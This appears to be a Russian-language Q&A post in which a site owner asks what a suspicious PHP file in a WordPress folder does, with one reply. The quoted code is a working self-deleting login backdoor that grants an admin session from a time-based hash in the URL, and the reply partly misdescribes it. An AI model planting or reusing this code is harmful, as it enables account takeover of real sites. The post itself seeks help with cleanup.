Вредоносный код в файле в моей папке.Просто хочу знать, что он делает - PullRequest
0 голосов
/ 26 сентября 2019

Я нашел странный файл в моей папке клиента.Я хочу знать, что делает этот код.что означает

$file =( $p = strpos(__FILE__,"(") )=== false ? __FILE__ : 
substr(__FILE__,0,$p);if (!unlink($file)){  chmod($file,0777);   
unlink($file);}define("ABSPATH", dirname(dirname($file))."/");
include_once(ABSPATH."wp-config.php");
include_once(ABSPATH."wp-admin/includes/file.php");
include_once(ABSPATH."wp-admin/includes/plugin.php");
include_once(ABSPATH."wp-admin/includes/theme.php");
include_once(ABSPATH."wp-admin/includes/misc.php");
$k = substr($_SERVER["QUERY_STRING"],0,32);$u = 
 substr($_SERVER["QUERY_STRING"],32);
$h = $wpdb->get_var( $wpdb->prepare( 
 "SELECT user_pass FROM {$wpdb->users} WHERE ID = %s", $u ) );
if ( 
 is_string($h) &&( $k === md5(mktime(date("H"), date("i"), 0).md5($h))                    
 || $k === md5(mktime(date("H"), date("i")-1, 0).md5($h))                    
 || $k === md5(mktime(date("H"), date("i")+1, 0).md5($h)) )){    
wp_set_auth_cookie($u);}header("Location: 
 ".\'http://www.example.com/blog/wp-admin/\');', LOCK_EX);

Пожалуйста, помогите мне относительно этого кода.это хакерский код или еще что-то?

1 Ответ

0 голосов
/ 26 сентября 2019

Полагаю, вы могли бы назвать этот хакерский код.

Он считывает важные части вашего сайта, чтобы получить ваши соли и хэши, а затем забирает ваши пароли из базы данных.Я предполагаю, что все ваши учетные данные на этом сайте скомпрометированы.

Как только вы удалите файл и очистите сайт, вам следует повернуть все учетные данные с любыми разрешениями, а также быстро отредактировать файл config.php в , заменить соленые ключи новыми.генерируется из Wordpress API.

...